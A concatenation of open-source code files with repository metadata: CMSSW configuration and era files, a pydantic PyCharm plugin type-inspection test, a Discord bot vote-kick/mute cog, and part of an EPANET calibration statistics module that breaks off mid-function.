threshold = cms.untracked.string('DEBUG')
)
)
process.OnlineDBOutputService = cms.Service("OnlineDBOutputService",
DBParameters = cms.PSet(
messageLevel = cms.untracked.int32(2),
authenticationPath = cms.untracked.string('.')
),
jobName = cms.untracked.string("TestLumiBasedUpdate"),
autoCommit = cms.untracked.bool(True),
connect = cms.string('sqlite_file:test_lumi.db'),
preLoadConnectionString = cms.untracked.string('sqlite_file:test_lumi.db'),
lastLumiFile = cms.untracked.string('lastLumi.txt'),
toPut = cms.VPSet(cms.PSet(
record = cms.string('PedestalsRcd'),
tag = cms.string('mytest'),
timetype = cms.untracked.string('Lumi'),
onlyAppendUpdatePolicy = cms.untracked.bool(True)
))
)
process.mytest = cms.EDAnalyzer("LumiBasedUpdateAnalyzer",
record = cms.untracked.string('PedestalsRcd'),
iovSize = cms.untracked.uint32(4),
lastLumiFile = cms.untracked.string('lastLumi.txt')
)
process.p = cms.Path(process.mytest)
|
3153a9677295fda871162c8b02a8e15f36793268
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Configuration/Eras/python/Era_Phase2C11I13T25M9_cff.py
|
d2a615082c43851cb305f4af0330a60e310f4b90
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 331
|
py
|
Era_Phase2C11I13T25M9_cff.py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2C11I13_cff import Phase2C11I13
from Configuration.Eras.Modifier_phase2_3DPixels_cff import phase2_3DPixels
from Configuration.Eras.Modifier_phase2_GE0_cff import phase2_GE0
Phase2C11I13T25M9 = cms.ModifierChain(Phase2C11I13, phase2_3DPixels, phase2_GE0)
|
3d4e8a2fdd2f7025d4aab1579c12b20c8b63e7dc
|
2aa15786d231136f4487ac904ada5719a0605f3d
|
/testData/typeinspection/fieldUnionInvalid.py
|
7e957171bb96886b18d2bb588606cf0ba096c984
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
koxudaxi/pydantic-pycharm-plugin
|
7b2f248e45aceccb58e12e67abb34c89e32a53a0
|
61455a7d63c46d567e739ae05f15475b84142a16
|
refs/heads/main
| 2023-08-23T07:23:40.067425
| 2023-08-07T16:25:52
| 2023-08-07T16:25:52
| 197,027,423
| 362
| 13
|
MIT
| 2023-09-14T16:39:41
| 2019-07-15T15:41:01
|
Kotlin
|
UTF-8
|
Python
| false
| false
| 301
|
py
|
fieldUnionInvalid.py
|
from typing import Union
from pydantic import BaseModel
class A(BaseModel):
a: Union[float, int]
A(<warning descr="Expected type 'Union[float, int]', got 'bytes' instead">a=bytes(123)</warning>)
A(<warning descr="Expected type 'Union[float, int]', got 'str' instead">a=str('123')</warning>)
|
0c34e4062af5ae848088454a72768b139267149d
|
04d9a118a63675c55abe63ccbd8498c6b02f9f80
|
/Cogs/VoteKick.py
|
9103391a6d7cb578a92a0ed8c9f4a9f0447dc82b
|
[
"MIT"
] |
permissive
|
corpnewt/CorpBot.py
|
06bd5ddc47adeecdae3ead6138378f9f88fe2b39
|
8c7d8fa412bd9728033bf0c5e0916c6ee9e86423
|
refs/heads/rewrite
| 2023-08-19T05:20:07.877579
| 2023-08-16T23:03:15
| 2023-08-16T23:03:15
| 68,509,454
| 393
| 201
|
MIT
| 2022-09-14T17:21:43
| 2016-09-18T08:59:35
|
Python
|
UTF-8
|
Python
| false
| false
| 22,970
|
py
|
VoteKick.py
|
import asyncio
import discord
import time
import parsedatetime
from datetime import datetime
from discord.ext import commands
from Cogs import DisplayName
from Cogs import ReadableTime
from Cogs import Nullify
from Cogs import Mute
def setup(bot):
# Add the bot and deps
settings = bot.get_cog("Settings")
mute = bot.get_cog("Mute")
bot.add_cog(VoteKick(bot, settings, mute))
class VoteKick(commands.Cog):
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings, muter):
self.bot = bot
self.settings = settings
self.check_time = 10
self.muter = muter
self.loop_list = []
global Utils, DisplayName
Utils = self.bot.get_cog("Utils")
DisplayName = self.bot.get_cog("DisplayName")
# Proof of concept stuff for reloading cog/extension
def _is_submodule(self, parent, child):
return parent == child or child.startswith(parent + ".")
@commands.Cog.listener()
async def on_unloaded_extension(self, ext):
# Called to shut things down
if not self._is_submodule(ext.__name__, self.__module__):
return
for task in self.loop_list:
task.cancel()
@commands.Cog.listener()
async def on_loaded_extension(self, ext):
# See if we were loaded
if not self._is_submodule(ext.__name__, self.__module__):
return
# Set our check loop
self.loop_list.append(self.bot.loop.create_task(self.checkVotes()))
async def checkVotes(self):
while not self.bot.is_closed():
await asyncio.sleep(self.check_time)
for guild in self.bot.guilds:
expire_time = self.settings.getServerStat(guild, "VotesResetTime")
vote_mute = self.settings.getServerStat(guild, "VotesToMute")
vote_mention = self.settings.getServerStat(guild, "VotesToMention")
if expire_time == 0:
# Never expire
continue
vote_list = self.settings.getServerStat(guild, "VoteKickArray")
vote_rem = []
for kicks in vote_list:
# Should be a dict like this:
# { "ID" : 123456789, "Kicks" : [ { "ID" : 123456789, "Added" : 123456789 } ] }
remove_list = []
for kick in kicks["Kicks"]:
if (kick["Added"] + expire_time) <= time.time():
remove_list.append(kick)
for rem in remove_list:
kicks["Kicks"].remove(rem)
if not len(kicks["Kicks"]):
# We removed them all - add to remove list
vote_rem.append(kicks)
else:
# We still have some - let's check our values
if len(kicks["Kicks"]) < vote_mute:
kicks["Muted"] = False
if len(kicks["Kicks"]) < vote_mention:
kicks["Mentioned"] = False
for rem in vote_rem:
vote_list.remove(rem)
self.settings.setServerStat(guild, "VoteKickArray", vote_list)
@commands.command(pass_context=True)
async def vkinfo(self, ctx):
"""Lists the vote-kick info."""
mute_votes = self.settings.getServerStat(ctx.guild, "VotesToMute")
ment_votes = self.settings.getServerStat(ctx.guild, "VotesToMention")
mute_time = self.settings.getServerStat(ctx.guild, "VotesMuteTime")
ment_chan = self.settings.getServerStat(ctx.guild, "VoteKickChannel")
vote_ment = self.settings.getServerStat(ctx.guild, "VoteKickMention")
vote_rest = self.settings.getServerStat(ctx.guild, "VotesResetTime")
vote_list = self.settings.getServerStat(ctx.guild, "VoteKickArray")
vote_anon = self.settings.getServerStat(ctx.guild, "VoteKickAnon")
msg = "__**Current Vote-Kick Settings For {}:**__\n```\n".format(Nullify.escape_all(ctx.guild.name))
msg += " Votes To Mute: {}\n".format(int(mute_votes))
msg += " Muted For: {}\n".format(ReadableTime.getReadableTimeBetween(0, mute_time))
msg += "Votes to Mention: {}\n".format(int(ment_votes))
if vote_ment:
role_check = DisplayName.roleForName(vote_ment, ctx.guild)
if not role_check:
user_check = DisplayName.memberForName(vote_ment, ctx.guild)
if not user_check:
msg += " Mention: None\n"
else:
msg += " Mention: {}\n".format(user_check)
else:
msg += " Mention: {} (role)\n".format(role_check)
else:
msg += " Mention: None\n"
m_channel = self.bot.get_channel(ment_chan)
if m_channel:
msg += " Mention in: #{}\n".format(m_channel.name)
else:
msg += " Mention in: None\n"
if vote_rest == 0:
msg += " Vote reset: Permanent\n"
elif vote_rest == 1:
msg += " Vote reset: After 1 second\n"
else:
msg += " Vote reset: After {}\n".format(ReadableTime.getReadableTimeBetween(0, vote_rest))
votes = 0
for user in vote_list:
votes += len(user["Kicks"])
msg += " Anonymous votes: {}\n".format(vote_anon)
msg += " Active votes: {}\n```".format(votes)
# Check if mention and mute are disabled
if (ment_votes == 0 or ment_chan == None or ment_chan == None) and (mute_votes == 0 or mute_time == 0):
msg += "\nSystem **not** configured fully."
await ctx.send(msg)
@commands.command(pass_context=True)
async def vkmention(self, ctx):
"""Gets which user or role is mentioned when enough votes against a user are reached."""
if not await Utils.is_bot_admin_reply(ctx): return
current_id = self.settings.getServerStat(ctx.guild, "VoteKickMention")
if not current_id:
await ctx.send("There is no user or role set to mention.")
return
current_role = DisplayName.roleForName(current_id, ctx.guild)
if current_role:
await ctx.send("The current role to mention is *{}*.".format(Nullify.escape_all(current_role.name)))
return
current_user = DisplayName.memberForName(current_id, ctx.guild)
if current_user:
await ctx.send("The current user to mention is *{}*.".format(DisplayName.name(current_user)))
return
await ctx.send("The current id ({}) does not match any users or roles - please consider updating this setting.".format(current_id))
@commands.command(pass_context=True)
async def setvkmention(self, ctx, *, user_or_role = None):
"""Sets which user or role is mentioned when enough votes against a user are reached."""
if not await Utils.is_bot_admin_reply(ctx): return
if user_or_role == None:
self.settings.setServerStat(ctx.guild, "VoteKickMention", None)
await ctx.send("Removed the vote kick mention!")
return
check_role = DisplayName.roleForName(user_or_role, ctx.guild)
if check_role:
self.settings.setServerStat(ctx.guild, "VoteKickMention", check_role.id)
await ctx.send("Vote kick will now mention the *{}* role.".format(Nullify.escape_all(check_role.name)))
return
check_user = DisplayName.memberForName(user_or_role, ctx.guild)
if check_user:
self.settings.setServerStat(ctx.guild, "VoteKickMention", check_user.id)
await ctx.send("Vote kick will now mention *{}.*".format(DisplayName.name(check_user)))
return
await ctx.send("I couldn't find *{}*...".format(Nullify.escape_all(user_or_role)))
@commands.command(pass_context=True)
async def vktomute(self, ctx, *, number_of_votes = None):
"""Sets the number of votes before a user is muted. Anything less than 1 will disable, and nothing will output the current setting."""
if not await Utils.is_bot_admin_reply(ctx): return
if number_of_votes == None:
# Output the current setting
current = self.settings.getServerStat(ctx.guild, "VotesToMute")
if current == 1:
await ctx.send("A user needs 1 vote to be muted.")
elif current < 1:
await ctx.send("This system is currently disabled.")
else:
await ctx.send("A user needs {} votes to be muted.".format(current))
return
try:
number_of_votes = int(number_of_votes)
except Exception:
await ctx.send("Number of votes must be an integer.")
return
if number_of_votes < 0:
number_of_votes = 0
if number_of_votes == 0:
self.settings.setServerStat(ctx.guild, "VotesToMute", 0)
await ctx.send("Number of votes to mute disabled.")
else:
self.settings.setServerStat(ctx.guild, "VotesToMute", number_of_votes)
await ctx.send("Number of votes to mute set to {}.".format(number_of_votes))
@commands.command(pass_context=True)
async def vktomention(self, ctx, *, number_of_votes = None):
"""Sets the number of votes before the selected role or user is mentioned. Anything less than 1 will disable, and nothing will output the current setting.
You will also want to make sure you have a role/user to mention - and a channel in which to mention them setup."""
if not await Utils.is_bot_admin_reply(ctx): return
if number_of_votes == None:
# Output the current setting
current = self.settings.getServerStat(ctx.guild, "VotesToMention")
if current == 1:
await ctx.send("A user needs 1 vote for the mention to trigger.")
elif current < 1:
await ctx.send("This system is currently disabled.")
else:
await ctx.send("A user needs {} votes for the mention to trigger.".format(current))
return
try:
number_of_votes = int(number_of_votes)
except Exception:
await ctx.send("Number of votes must be an integer.")
return
if number_of_votes < 0:
number_of_votes = 0
if number_of_votes == 0:
self.settings.setServerStat(ctx.guild, "VotesToMention", 0)
await ctx.send("Number of votes to mention disabled.")
else:
self.settings.setServerStat(ctx.guild, "VotesToMention", number_of_votes)
await ctx.send("Number of votes to mention set to {}.".format(number_of_votes))
@commands.command(pass_context=True)
async def vkchannel(self, ctx):
"""Gets which channel then mention posts to when enough votes against a user are reached."""
if not await Utils.is_bot_admin_reply(ctx): return
current_id = self.settings.getServerStat(ctx.guild, "VoteKickChannel")
if not current_id:
await ctx.send("There is no channel set to post to.")
return
current_channel = self.bot.get_channel(current_id)
if current_channel:
await ctx.send("The current channel to post in is *{}*.".format(current_channel.mention))
return
await ctx.send("The current id ({}) does not match any channels - please consider updating this setting.".format(current_id))
@commands.command(pass_context=True)
async def setvkchannel(self, ctx, *, channel = None):
"""Sets which channel then mention posts to when enough votes against a user are reached."""
if not await Utils.is_bot_admin_reply(ctx): return
if channel == None:
self.settings.setServerStat(ctx.guild, "VoteKickChannel", None)
await ctx.send("Removed the vote kick channel.")
return
check_channel = DisplayName.channelForName(channel, ctx.guild, "text")
if check_channel:
self.settings.setServerStat(ctx.guild, "VoteKickChannel", check_channel.id)
await ctx.send("Vote kick will now be mentioned in *{}.*".format(check_channel.mention))
return
await ctx.send("I couldn't find *{}*...".format(Nullify.escape_all(channel)))
@commands.command(pass_context=True)
async def vkmutetime(self, ctx, *, the_time = None):
"""Sets the number of time a user is muted when the mute votes are reached - 0 or less will disable the system."""
if not await Utils.is_bot_admin_reply(ctx): return
if the_time == None:
# Output the current setting
current = self.settings.getServerStat(ctx.guild, "VotesMuteTime")
if current < 1:
await ctx.send("This system is currently disabled.")
else:
await ctx.send("Mute time is currently set to {}.".format(ReadableTime.getReadableTimeBetween(0, current)))
return
seconds = None
try:
# Get current time - and end time
currentTime = int(time.time())
cal = parsedatetime.Calendar()
time_struct, parse_status = cal.parse(the_time)
start = datetime(*time_struct[:6])
end = time.mktime(start.timetuple())
# Get the time from now to end time
seconds = end-currentTime
except Exception:
pass
if seconds == None:
await ctx.send("Hmmm - I couldn't figure out what time frame you wanted...")
return
if seconds < 0:
seconds = 0
if seconds == 0:
self.settings.setServerStat(ctx.guild, "VotesMuteTime", 0)
await ctx.send("Mute time disabled.")
else:
self.settings.setServerStat(ctx.guild, "VotesMuteTime", seconds)
await ctx.send("Mute time set to {}.".format(ReadableTime.getReadableTimeBetween(0, seconds)))
@commands.command(pass_context=True)
async def vkexpiretime(self, ctx, *, the_time = None):
"""Sets the amount of time before a vote expires. 0 or less will make them permanent."""
if not await Utils.is_bot_admin_reply(ctx): return
if the_time == None:
# Output the current setting
current = self.settings.getServerStat(ctx.guild, "VotesResetTime")
if current < 1:
await ctx.send("Votes never expire.")
else:
await ctx.send("Votes will expire after {}.".format(ReadableTime.getReadableTimeBetween(0, current)))
return
seconds = None
try:
# Get current time - and end time
currentTime = int(time.time())
cal = parsedatetime.Calendar()
time_struct, parse_status = cal.parse(the_time)
start = datetime(*time_struct[:6])
end = time.mktime(start.timetuple())
# Get the time from now to end time
seconds = end-currentTime
except Exception:
pass
if seconds == None:
await ctx.send("Hmmm - I couldn't figure out what time frame you wanted...")
return
if seconds < 0:
seconds = 0
if seconds == 0:
self.settings.setServerStat(ctx.guild, "VotesResetTime", 0)
await ctx.send("Votes will never expire.")
else:
self.settings.setServerStat(ctx.guild, "VotesResetTime", seconds)
await ctx.send("Votes will expire after {}.".format(ReadableTime.getReadableTimeBetween(0, seconds)))
@commands.command(pass_context=True)
async def vkanon(self, ctx, *, yes_no = None):
"""Sets whether vote messages are removed after voting (bot-admin only; always off by default)."""
if not await Utils.is_bot_admin_reply(ctx): return
setting_name = "Vote kick anon"
setting_val = "VoteKickAnon"
current = self.settings.getServerStat(ctx.guild, setting_val)
if yes_no == None:
if current:
msg = "{} currently *enabled.*".format(setting_name)
else:
msg = "{} currently *disabled.*".format(setting_name)
elif yes_no.lower() in [ "yes", "on", "true", "enabled", "enable" ]:
yes_no = True
if current == True:
msg = '{} remains *enabled*.'.format(setting_name)
else:
msg = '{} is now *enabled*.'.format(setting_name)
elif yes_no.lower() in [ "no", "off", "false", "disabled", "disable" ]:
yes_no = False
if current == False:
msg = '{} remains *disabled*.'.format(setting_name)
else:
msg = '{} is now *disabled*.'.format(setting_name)
else:
msg = "That's not a valid setting."
yes_no = current
if not yes_no == None and not yes_no == current:
self.settings.setServerStat(ctx.guild, setting_val, yes_no)
await ctx.send(msg)
@commands.command(pass_context=True)
async def vk(self, ctx, user = None, *, server = None):
"""Places your vote to have the passed user kicked."""
# Should be a dict like this:
# { "ID" : 123456789, "Kicks" : [ { "ID" : 123456789, "Added" : 123456789 } ] }
if user == None:
await ctx.send('Usage: `{}vk "[user]" [server]`'.format(ctx.prefix))
return
if server == None:
guild = ctx.guild
else:
found = False
for guild in self.bot.guilds:
if not server.lower() in [guild.name.lower(), str(guild.id)]:
continue
found = True
break
if not found:
guild = ctx.guild
user = user + " " + server
if not guild and not server:
await ctx.send("Specify what server the user that you are vote kicking is in.")
return
elif not guild and server:
await ctx.send("I couldn't find that server.")
return
if ctx.author not in guild.members:
await ctx.send("You're not a member of that server!")
return
server_msg = " in **{}**".format(Nullify.escape_all(guild.name)) if guild != ctx.guild else ""
check_user = DisplayName.memberForName(user, guild)
if not check_user:
await ctx.send("I couldn't find *{}*{}...".format(Nullify.escape_all(user), server_msg))
return
mute_votes = self.settings.getServerStat(guild, "VotesToMute")
ment_votes = self.settings.getServerStat(guild, "VotesToMention")
mute_time = self.settings.getServerStat(guild, "VotesMuteTime")
ment_chan = self.settings.getServerStat(guild, "VoteKickChannel")
vote_ment = self.settings.getServerStat(guild, "VoteKickMention")
vote_anon = self.settings.getServerStat(guild, "VoteKickAnon")
if vote_anon and not isinstance(ctx.channel, discord.DMChannel):
await ctx.message.delete()
# Check if mention and mute are disabled
if (ment_votes == 0 or ment_chan == None or ment_chan == None) and (mute_votes == 0 or mute_time == 0):
await ctx.send('This function is not setup{} yet.'.format(server_msg))
return
# Check if we're trying to kick ourselves
if check_user.id == ctx.author.id:
await ctx.send("You should probably find a way to be okay with yourself. Kicking yourself will get you nowhere.")
return
if Utils.is_bot_admin(ctx,check_user):
return await ctx.channel.send('You cannot vote to kick the admins. Please work out any issues you may have with them in a civil manner.')
vote_list = self.settings.getServerStat(guild, "VoteKickArray")
for member in vote_list:
if member["ID"] == check_user.id:
# They're in the list - let's see if you've already voted for them
for vote in member["Kicks"]:
if vote["ID"] == ctx.author.id:
await ctx.send("You've already voted to kick that member. You cannot vote against them again while your vote is still active.")
return
# We haven't voted for them yet - add our vote
member["Kicks"].append({ "ID" : ctx.author.id, "Added" : time.time() })
# Update the array
self.settings.setServerStat(guild, "VoteKickArray", vote_list)
await ctx.send("Vote kick added for *{}!*".format(DisplayName.name(check_user)))
await self._check_votes(ctx, check_user)
return
# Never found the member
vote_list.append({
"ID" : check_user.id,
"Muted" : False,
"Mentioned" : False,
"Kicks" : [ { "ID" : ctx.author.id, "Added" : time.time() } ]
})
# Set the list
self.settings.setServerStat(guild, "VoteKickArray", vote_list)
await ctx.send("Vote kick added for *{}*{}!".format(DisplayName.name(check_user), server_msg))
await self._check_votes(ctx, check_user)
@commands.command(pass_context=True)
async def vkclear(self, ctx, *, user = None):
"""Clears the votes against the passed user (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
if user == None:
await ctx.send("Usage: `{}vkclear [user]`".format(ctx.prefix))
return
check_user = DisplayName.memberForName(user, ctx.guild)
if not check_user:
await ctx.send("I couldn't find *{}*...".format(Nullify.escape_all(user)))
return
vote_list = self.settings.getServerStat(ctx.guild, "VoteKickArray")
for member in vote_list:
if member["ID"] == check_user.id:
vote_list.remove(member)
self.settings.setServerStat(ctx.guild, "VoteKickArray", vote_list)
await ctx.send("All votes against *{}* have been removed.".format(DisplayName.name(check_user)))
return
await ctx.send("*{}* has no votes against them - nothing to clear.".format(DisplayName.name(check_user)))
@commands.command(pass_context=True)
async def vks(self, ctx, *, user = None):
"""Lists the vote count of the passed user (bot-admin only) or the author if no user was passed."""
# Default to author if not admin/bot-admin
if not Utils.is_bot_admin(ctx):
user = None
if user == None:
user = ctx.author.mention
check_user = DisplayName.memberForName(user, ctx.guild)
if not check_user:
await ctx.send("I couldn't find *{}*...".format(Nullify.escape_all(user)))
return
vote_list = self.settings.getServerStat(ctx.guild, "VoteKickArray")
for member in vote_list:
if member["ID"] == check_user.id:
if len(member["Kicks"]) == 1:
await ctx.send("*{}* has 1 vote against them.".format(DisplayName.name(check_user)))
else:
await ctx.send("*{}* has {} votes against them.".format(DisplayName.name(check_user), len(member["Kicks"])))
return
await ctx.send("*{}* has 0 votes against them.".format(DisplayName.name(check_user)))
async def _check_votes(self, ctx, member = None):
# A helper function that checks if a user needs to be punished for a vote level
guild = ctx.guild
vote_list = self.settings.getServerStat(guild, "VoteKickArray")
vote_mute = self.settings.getServerStat(guild, "VotesToMute")
mute_time = self.settings.getServerStat(guild, "VotesMuteTime")
vote_mention = self.settings.getServerStat(guild, "VotesToMention")
mention_id = self.settings.getServerStat(guild, "VoteKickMention")
m_target = DisplayName.roleForName(mention_id, guild)
if not m_target:
m_target = DisplayName.memberForName(mention_id, guild)
channel_id = self.settings.getServerStat(guild, "VoteKickChannel")
m_channel = self.bot.get_channel(channel_id)
for user in vote_list:
if member != None and member.id != user["ID"]:
# skip this user
continue
# Check the user
# Check mutes
if vote_mute > 0 and len(user["Kicks"]) >= vote_mute and user["Muted"] == False:
if mute_time == 0:
# Disabled
continue
cd = self.settings.getUserStat(member, guild, "Cooldown")
isMute = self.settings.getUserStat(member, guild, "Muted", False)
if cd == None:
if isMute:
# We're now muted permanently
continue
# Check our cooldowns
elif cd >= (time.time() + mute_time):
# Cooldown is higher as is - ignore
continue
# We need to mute
await self.muter._mute(member, ctx.message.guild, time.time() + mute_time)
user["Muted"] = True
await ctx.send("*{}* has been muted for {}.".format(DisplayName.name(member), ReadableTime.getReadableTimeBetween(0, mute_time)))
# Check for mention
if vote_mention > 0 and len(user["Kicks"]) >= vote_mention and user["Mentioned"] == False:
if not m_channel or not m_target:
continue
kick_words = "1 user"
if not len(user["Kicks"]) == 1:
kick_words = "{} users".format(len(user["Kicks"]))
user["Mentioned"] = True
await m_channel.send("{} - *{}* has had {} vote to kick them.".format(m_target.mention, member.mention, kick_words),allowed_mentions=discord.AllowedMentions.all())
|
f44107106133bb0e76f4452d73e00b8101abc66e
|
1aa4a01014ff5408c8979d2ee91435515a376bcb
|
/src/core/epanet/calibration.py
|
958148da6f948e285a1d732f486ada9bc1253780
|
[] |
no_license
|
USEPA/SWMM-EPANET_User_Interface
|
49b41b27bfcf7a934203935ccac3cee2ed7c538c
|
d49a589fc923c716c9ff607228282073126ce6cc
|
refs/heads/dev-ui-py3qt5
| 2022-10-06T14:55:55.322050
| 2022-09-26T19:25:09
| 2022-09-26T19:25:09
| 48,242,880
| 121
| 77
| null | 2020-09-15T15:18:32
| 2015-12-18T15:41:52
|
Python
|
UTF-8
|
Python
| false
| false
| 15,513
|
py
|
calibration.py
|
from core.project_base import ProjectBase, Section, SectionAsList
#import hydraulics.node
#import hydraulics.link
from enum import Enum
import sys
import csv
import pandas as pd
import os.path
#for banker's rounding
import numpy as np
class ECalibrationType(Enum):
"""Type of Calibration"""
DEMAND = 1
HEAD = 2
PRESSURE = 3
QUALITY = 4
FLOW = 5
VELOCITY = 6
NONE = 7
class ECalibrationFileStatus(Enum):
NeedToRead = 1
ReadToCompletion = 2
FileNotExists = 3
ReadIncomplete = 4
class CalibrationDataset:
colname_obs = 'Obs'
colname_sim = 'Sim'
colname_diff = 'Obs-Sim'
def __init__(self):
self.id = ''
self.data = None
self.is_selected = False
self.sum_obs = 0.0 #Sums[2]
self.sum_sim = 0.0 #Sums[3]
self.sum_err = 0.0 #Sums[4] e = Abs(sim-obs)
self.sum_err2 = 0.0 #Sums[5] e*e
self.sum_sim_stats_ctr = 0 #Sum[1]
self.sum_obs_non0_ctr = 0 #Sum[7]
self.sum_err_relative = 0.0 #Sum[8] e/obs
self.mean_obs = 0.0 # stats[2] obs mean
self.mean_sim = 0.0 # stats[3] sim mean
self.mean_err = 0.0 # stats[4] mean error
self.mean_rms = 0.0 # stats[5] RMS (root-mean-square) error
self.need_to_calculate_stats = True
def read_simulated_values(self, sim_tser, rptStart, rptStep, Dur, Nsim):
# Now match up obs vs sim
#self.data = pd.DataFrame()
strsim = CalibrationDataset.colname_sim
for lrow in range(0, len(self.data)):
tobs_sec = self.data.index[lrow]
self.data[strsim].values[lrow] = \
self.get_sim_value(sim_tser, tobs_sec, rptStart, rptStep, Dur, Nsim)
def get_sim_value(self, sim_tser, tobs_sec, rptStart, rptStep, Dur, Nsim):
'''
Args:
sim_tser: simulation time series
tobs_sec: an observation time in seconds
rptStart: start of reporting period (sec)
rptStep: interval between reporting (sec)
Dur: duration of simulation (sec)
Nsim: number of time periods
Returns: simulated value at time tobs_sec
(interpolate if tobs_sec falls between time periods)
'''
# ToDo: ensure report timestep is in seconds
j1 = 0 #time period, int
j2 = 0 #time period, int
t1 = 0.0 #time in hours, single
t2 = 0.0 #time in hours, single
v1 = 0.0 #sim value at t1
v2 = 0.0 #sim value at t2
vs = -1.0 #final simulated value, single
e = 0.0 #error, single
if Nsim == 1:
vs = sim_tser[0]
elif tobs_sec >= rptStart and tobs_sec <= Dur:
#ensure floor division or floor divsion
j1 = int((tobs_sec - rptStart) // rptStep)
j2 = j1 + 1
if j1 >= 0 and j2 < Nsim:
t1 = sim_tser.index[j1]
v1 = sim_tser[j1]
t2 = sim_tser.index[j2]
v2 = sim_tser[j2]
if sim_tser.index[1] / 3600.0 < 1.0:
t1 *= 3600.0
t2 *= 3600.0
vs = v1 + (tobs_sec - t1) / (t2 - t1) * (v2 - v1)
return vs
def read_simulated_values_seqential(self, sim_tser):
# Now match up obs vs sim
self.data = pd.DataFrame()
lsimrow_start = 0
strsim = CalibrationDataset.colname_sim
for lrow in range(0, len(self.data)):
tobs_sec = self.data.index[lrow]
self.data.ix[lrow, strsim], lsimrow_start = \
self.get_sim_value(sim_tser, tobs_sec, lsimrow_start)
pass
def get_sim_value_seqential(self, sim_tser, tobs_sec, simrow_start):
for lrow in range(simrow_start, len(sim_tser)):
#ToDo: ensure report timestep is in seconds
rpttime = sim_tser.index[lrow] * 3600.0
if rpttime == tobs_sec:
return (sim_tser[lrow], lrow)
elif rpttime > tobs_sec:
# now interpolate
v1 = sim_tser[lrow - 1]
t1 = sim_tser.index[lrow - 1] * 3600
v2 = sim_tser[lrow]
t2 = sim_tser.index[lrow] * 3600
ratio_t = (tobs_sec - t1) / (t2 - t1)
v_idx = v1 + (v2 - v1) * ratio_t
return (v_idx, lrow)
pass
def calc_stats(self):
vo = 0.0
vs = 0.0
sigma = Calibration.DefMeasError / 100.0 #std. dev. of measurement error
for idx in range(0, len(self.data)):
vs = self.data[CalibrationDataset.colname_sim].values[idx]
if vs >= 0.0:
self.sum_sim_stats_ctr += 1
vo = self.data[CalibrationDataset.colname_obs].values[idx]
self.sum_obs += vo
self.sum_sim += vs
self.sum_err += abs(vs - vo)
self.sum_err2 += (vs - vo) ** 2
if sigma > 0 and vo != 0.0:
self.sum_obs_non0_ctr += 1
self.sum_err_relative += ((vs - vo)/vo) ** 2
self.SumsToStats()
self.need_to_calculate_stats = False
pass
def SumsToStats(self):
if self.sum_sim_stats_ctr > 0:
self.mean_obs = self.sum_obs / self.sum_sim_stats_ctr
self.mean_sim = self.sum_sim / self.sum_sim_stats_ctr
self.mean_err = self.sum_err / self.sum_sim_stats_ctr
self.mean_rms = np.sqrt(self.sum_err2 / self.sum_sim_stats_ctr)
class Calibration(Section):
header_char = ';'
delimiter_char = '\t'
DefMeasError = 5 #precision error (%) of measurement, integer
FLOWTOL = 0.005
MISSING = -1.0e10
METERSperFOOT = 0.3048
FEETperMETER = 3.281
def __init__(self, afilename):
Section.__init__(self)
self.name = ''
"""???just an identifier???"""
self.etype = ECalibrationType.NONE
"""category of calibration data"""
self.is_flow = None
self.filename = afilename
"""calibration data file name"""
self.hobjects = {}
"""object-calibration dataset collection"""
self.quality = None
"""calibration data chemical collection"""
self.headers = None
"""calibration data file header line collection"""
self.status = ECalibrationFileStatus.NeedToRead
"""calibration data file access status"""
self.netsum_obs = 0.0 #Sums[2]
self.netsum_sim = 0.0 #Sums[3]
self.netsum_err = 0.0 #Sums[4] e = Abs(sim-obs)
self.netsum_err2 = 0.0 #Sums[5] e*e
self.netsum_sim_stats_ctr = 0 #Sum[1]
self.netsum_obs_non0_ctr = 0 #Sum[7]
self.netsum_err_relative = 0.0 #Sum[8] e/obs
self.meansum_ctr = 0 # s[1] # of values
self.meansum_obs = 0.0 # s[2] obs mean: Sum of X
self.meansum_sim = 0.0 # s[3] sim mean: Sum of Y
self.meansum_obs2 = 0.0 # s[4] Sum of X*X
self.meansum_sim2 = 0.0 # s[5] Sum of Y*Y
self.meansum_os = 0.0 # s[6] Sum of X*Y
self.netmean_obs = 0.0
self.netmean_sim = 0.0
self.netmean_err = 0.0 # stats[4] mean error
self.netmean_rms = 0.0 # stats[5] RMS (root-mean-square) error
self.read_data()
def str_hours_to_float(self, strtime):
'''
converst time in Hours:Mins:Secs to decimal hours
Args:
strtime: input time string
Returns:
'''
n = 0
hr = 0
min = 0
sec = 0
#strtime = '2000:55:00'
try:
good_hr = False
good_min = False
good_sec = False
if ':' in strtime:
#parse strtime into hours, minuts, & seconds
sa = strtime.split(':')
hr, good_hr = self.intTryParse(sa[0])
min, good_min = self.intTryParse(sa[1])
if len(sa) >= 3:
sec, good_sec = self.intTryParse(sa[2])
if not good_hr:
hr = 0
if not good_min:
min = 0
if not good_sec:
sec = 0
return float(hr) + float(min) / 60.0 + float(sec) / 3600.0
else:
#if no ':' separator then strtime is a decimal number
t = -1.0
try:
t = float(strtime)
except ValueError:
t = -1.0
return t
except ValueError:
return -1.0
finally:
pass
def intTryParse(self, value):
try:
return int(value), True
except ValueError:
return value, False
def floatTryParse(self, value):
try:
return float(value), True
except ValueError:
return value, False
def read_data(self):
'''
consult Fcalib.pas
Returns:
'''
if not os.path.exists(self.filename):
self.hobjects.clear()
self.status = ECalibrationFileStatus.FileNotExists
return
try:
if self.headers == None:
self.headers = []
else:
del self.headers[:]
with open(self.filename, 'r') as f:
strobs = CalibrationDataset.colname_obs
strsim = CalibrationDataset.colname_sim
reader = csv.reader(f, delimiter = Calibration.delimiter_char)
line = ""
while True:
line = f.readline()
if len(line) > 0 and line[0] == Calibration.header_char:
self.headers.append(line)
else:
break
f.seek(0)
for l in range(1, len(self.headers) + 1):
next(reader)
times = None
values = None
simvals = None
id_prev = '-999999'
time_val_hr = 0.0
time_val_sec = 0.0
v_val = 0.0
v_val_good = False
for id, time, value in reader:
if len(id.strip()) > 0:
